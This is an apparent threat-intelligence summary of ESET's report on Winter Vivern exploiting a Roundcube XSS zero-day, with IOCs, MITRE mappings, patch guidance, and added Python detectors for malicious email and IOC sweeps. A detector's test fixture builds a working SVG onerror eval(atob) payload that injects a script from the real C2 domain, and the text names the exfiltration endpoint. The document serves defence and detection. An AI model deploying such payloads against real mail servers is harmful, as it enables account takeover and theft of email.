Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers

ESET Research discovered that the Winter Vivern group exploited a zero‑day XSS (CVE-2023-5631) in Roundcube Webmail by sending specially crafted emails containing an SVG with a base64‑encoded payload that, when the message is viewed, injects JavaScript into the victim’s Roundcube session. The injected script fetches a JavaScript loader from a C2 domain and exfiltrates email data to the attacker’s server. #WinterVivern #Roundcube

Keypoints

  • Winter Vivern exploited a zero‑day XSS in Roundcube’s rcube_washtml.php to inject JavaScript via a crafted email.
  • The malicious email contained an SVG with a base64 payload that used an onerror handler to execute eval(atob(…)).
  • The injected JavaScript appended a script element whose src pointed at the loader checkupdate.js on recsecas[.]com, the C2 domain.
  • The final payload enumerated folders and emails and exfiltrated messages to https://recsecas[.]com/controlserver/saveMessage over HTTPS.
  • Affected Roundcube versions: 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15; Roundcube patched the flaw on 2023-10-14 and shipped the fixed releases on 2023-10-16.
  • IOCs include the loader filename checkupdate.js and two SHA‑1 hashes, the domain recsecas[.]com (38.180.76[.]31), and the sender team.managment@outlook[.]com.

MITRE Techniques

  • [T1583.001] Acquire Infrastructure: Domains – Winter Vivern operators bought domains used for C2 (‘Winter Vivern operators bought a domain at Registrar.eu.’)
  • [T1583.004] Acquire Infrastructure: Server – Operators rented servers to host C2 infrastructure (‘Winter Vivern operators rented a server at M247.’)
  • [T1587.004] Develop Capabilities: Exploits – The group developed or used an exploit for Roundcube (‘Winter Vivern operators probably developed an exploit for Roundcube.’)
  • [T1190] Exploit Public-Facing Application – The attack exploited a Roundcube XSS via a crafted email (‘Winter Vivern sent an email exploiting CVE‑2023-5631 in Roundcube.’)
  • [T1566] Phishing – The XSS was delivered through a phishing-style email that must be viewed in Roundcube (‘The vulnerability is triggered via a phishing email, which should be opened in the Roundcube webmail by the victim.’)
  • [T1203] Exploitation for Client Execution – The XSS causes execution of attacker JavaScript in the client browser (‘The JavaScript payload is executed by an XSS vulnerability in Roundcube.’)
  • [T1087.003] Account Discovery: Email Account – The payload enumerates email folders/accounts (‘The JavaScript payload can list folders in the email account.’)
  • [T1114.002] Email Collection: Remote Email Collection – The payload collects and exfiltrates email messages from the account (‘The JavaScript payload can exfiltrate emails from the Roundcube account.’)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 and exfiltration use HTTPS (‘C&C communications use HTTPs.’)
  • [T1041] Exfiltration Over C2 Channel – Exfiltration is performed to the attacker C2 server over HTTPS (‘Exfiltration is done via HTTPs and to the same C&C server.’)

Indicators of Compromise

  • [Files] JavaScript payloads – checkupdate.js (SHA-1: 97ED594EF2B5755F0549C6C5758377C0B87CFAE0), final payload (SHA-1: 8BF7FCC70F6CE032217D9210EF30314DDD6B8135)
  • [Network] C2 domain and IP – recsecas[.]com, 38.180.76[.]31 (C2 server, hosted at M247 Europe SRL)
  • [Email addresses] Phishing sender – team.managment@outlook[.]com (used to deliver the malicious message)

Attack chain and exploitation: The attackers sent a seemingly benign email (subject “Get started in your Outlook”, sender team.managment@outlook[.]com) whose HTML body contained an SVG element; a tag inside it carried an invalid href and an onerror attribute holding a base64‑encoded payload. When the victim opened the message in Roundcube, the server-side sanitizer rcube_washtml.php failed to strip the handler, so the browser fired onerror, ran eval(atob(…)) in the context of the user’s Roundcube session and appended a script element pointing at the attacker’s C2. No interaction beyond viewing the message was required.

Loader and payload behavior: The injected code dynamically appended a script element whose src loaded checkupdate.js from recsecas[.]com; that loader then fetched the final, obfuscated JavaScript payload. Running with the victim’s authenticated session, the final payload enumerated folders and emails in the logged‑in Roundcube account and exfiltrated message data by POSTing it to https://recsecas[.]com/controlserver/saveMessage over HTTPS, so remote email collection required nothing more than the victim viewing the message in their browser.
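The two paragraphs above describe what a stored copy of the malicious message looks like: an HTML part, an SVG, an event-handler attribute wrapping eval(atob(…)), and a decoded script that appends a script element pointing at the C2. The following Python is an added example, not code from ESET or from the Roundcube project, that parses a raw RFC 822 message, flags surviving event-handler attributes in its HTML parts, decodes any base64 handed to atob(), and lists the URLs the decoded script references. The sample message and its injected script are constructed here to mimic the reported chain; they are not the real Winter Vivern payload, and the exact SVG markup (an <image> with an invalid href) is an assumption.

```python
import base64
import email
import re
from email import policy
from typing import Optional

# Event-handler attribute (onerror=, onload=, ...) with a quoted value.
HANDLER_RE = re.compile(r"""\bon[a-z]+\s*=\s*(["'])(.*?)\1""", re.I | re.S)
# eval(atob('<base64>')) inside the handler value.
ATOB_RE = re.compile(r"""atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")


def decode_handler_payload(handler_js: str) -> Optional[str]:
    """Return the base64-decoded script passed to atob(), or None if absent/invalid."""
    m = ATOB_RE.search(handler_js)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_message(raw: str) -> list:
    """Flag event-handler attributes in the HTML parts of a raw RFC 822 message.

    Roundcube's sanitizer (rcube_washtml) is supposed to strip these, so any
    handler that survives in stored mail, especially one wrapping
    eval(atob(...)) inside an SVG, deserves a look. Each finding carries the
    raw handler JavaScript, the decoded payload if base64 was used, the URLs
    the script references, and whether the handler sits inside an <svg>.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        for m in HANDLER_RE.finditer(html):
            handler = m.group(2)
            decoded = decode_handler_payload(handler)
            before = html[: m.start()].lower()
            findings.append({
                "handler": handler,
                "decoded": decoded,
                "urls": URL_RE.findall(decoded or handler),
                # crude: last <svg> opened before the handler is still open
                "inside_svg": before.rfind("<svg") > before.rfind("</svg>"),
            })
    return findings


# Constructed sample (NOT the real Winter Vivern message): an HTML body with an
# SVG whose <image> has an invalid href, so onerror fires and eval()s a base64
# string that injects a <script> pointing at the reported C2 domain.
INJECTED_JS = ("var s=document.createElement('script');"
               "s.src='https://recsecas.com/checkupdate.js';"
               "document.body.appendChild(s);")
B64 = base64.b64encode(INJECTED_JS.encode()).decode()
SAMPLE_EML = (
    "From: team.managment@outlook.com\n"
    "To: victim@example.org\n"
    "Subject: Get started in your Outlook\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    "<html><body><p>Welcome to Outlook.</p>\n"
    '<svg id="x" style="display:none"><image href="x" '
    + f"onerror=\"eval(atob('{B64}'))\"></svg></body></html>\n"
)
BENIGN_EML = ("From: a@example.org\nTo: b@example.org\nSubject: hi\n"
              "Content-Type: text/html\n\n<p>hello</p>\n")

if __name__ == "__main__":
    for f in scan_message(SAMPLE_EML):
        print("handler :", f["handler"])
        print("decoded :", f["decoded"])
        print("urls    :", f["urls"], "inside_svg =", f["inside_svg"])
```

Run it over .eml exports or the raw messages in a Roundcube user's IMAP store; a legitimate newsletter should never produce a finding, so every hit is worth triage, and the decoded URLs can be compared against the domain and path IOCs.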

Mitigation and affected versions: The vulnerability was assigned CVE-2023-5631 and patched in Roundcube releases 1.6.4, 1.5.5, and 1.4.15; administrators should update immediately. When hunting, note that the C2 traffic originates from the victim’s browser rather than the Roundcube host, so connections to recsecas[.]com / 38.180.76[.]31 and requests for checkupdate.js or /controlserver/saveMessage appear in egress proxy, DNS and endpoint logs, not in the webmail server’s access log; the two listed SHA‑1s apply to the JavaScript files themselves (for example in browser caches). Stored messages carrying an SVG with an event-handler attribute such as onerror are also worth searching for, since the sanitizer should never let one through.
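As an added example of the checks this paragraph calls for (this is the editor's code, not ESET's or Roundcube's), the Python below does three things: decides whether a Roundcube version string falls in an affected range, sweeps log lines for the network IOCs, and classifies a file by name and SHA‑1 against the listed hashes. The proxy log lines are constructed for the example; treating branches older than 1.4 (end of life, never fixed) as affected and branches newer than 1.6 as unaffected is an assumption, as is the log format.

```python
import hashlib
import re

# IOCs from the ESET report, with defanging brackets removed for matching.
IOC_FILENAMES = {"checkupdate.js"}
IOC_SHA1 = {
    "97ed594ef2b5755f0549c6c5758377c0b87cfae0",  # checkupdate.js loader
    "8bf7fcc70f6ce032217d9210ef30314ddd6b8135",  # final payload
}
LOG_IOC_RE = re.compile(
    r"recsecas\.com|38\.180\.76\.31|/controlserver/saveMessage|checkupdate\.js",
    re.I,
)

# First fixed release per branch; everything below it on that branch is affected.
FIXED = {(1, 6): (1, 6, 4), (1, 5): (1, 5, 5), (1, 4): (1, 4, 15)}


def parse_version(v: str) -> tuple:
    """'1.6.3' -> (1, 6, 3); missing components are padded with 0."""
    nums = [int(x) for x in re.findall(r"\d+", v)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def is_affected(version: str) -> bool:
    """True if this Roundcube version is vulnerable to CVE-2023-5631.

    Assumption: branches older than 1.4 are end of life and never received
    the fix, so they are reported as affected; branches newer than 1.6 are
    not in the advisory's list and are reported as not affected.
    """
    ver = parse_version(version)
    branch = ver[:2]
    if branch in FIXED:
        return ver < FIXED[branch]
    return branch < (1, 4)


def sweep_logs(lines) -> list:
    """Return (line_no, matched_ioc, line) for every line hitting a network IOC.

    The browser, not the Roundcube server, talks to the C2, so feed this
    egress proxy, DNS or endpoint logs rather than the webmail access log.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_IOC_RE.search(line)
        if m:
            hits.append((n, m.group(0).lower(), line.rstrip()))
    return hits


def classify_file(name: str, data: bytes) -> list:
    """Reasons a file matches the file IOCs: 'filename', 'sha1', or both."""
    sha1 = hashlib.sha1(data).hexdigest()
    reasons = []
    if name in IOC_FILENAMES:
        reasons.append("filename")
    if sha1 in IOC_SHA1:
        reasons.append("sha1")
    return reasons


# Constructed proxy log lines (format is an assumption) for the example.
SAMPLE_PROXY_LOG = [
    "2023-10-11T09:14:02Z client=10.1.2.3 GET https://recsecas.com/checkupdate.js 200",
    "2023-10-11T09:14:03Z client=10.1.2.3 POST https://recsecas.com/controlserver/saveMessage 200",
    "2023-10-11T09:14:05Z client=10.1.2.9 GET https://www.example.org/ 200",
    "2023-10-11T09:14:07Z client=10.1.2.3 CONNECT 38.180.76.31:443",
]

if __name__ == "__main__":
    for v in ("1.6.3", "1.6.4", "1.5.5", "1.4.14", "1.3.17"):
        print(v, "affected" if is_affected(v) else "fixed")
    for hit in sweep_logs(SAMPLE_PROXY_LOG):
        print(hit)
    print(classify_file("checkupdate.js", b"console.log('x')"))
```

A filename hit without a hash hit still deserves a look: the loader can be re-served with different content, and the two SHA‑1s only cover the samples ESET analysed. For the file sweep, walk a webroot or a browser cache directory and call classify_file on each file's name and bytes.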

Read more: https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/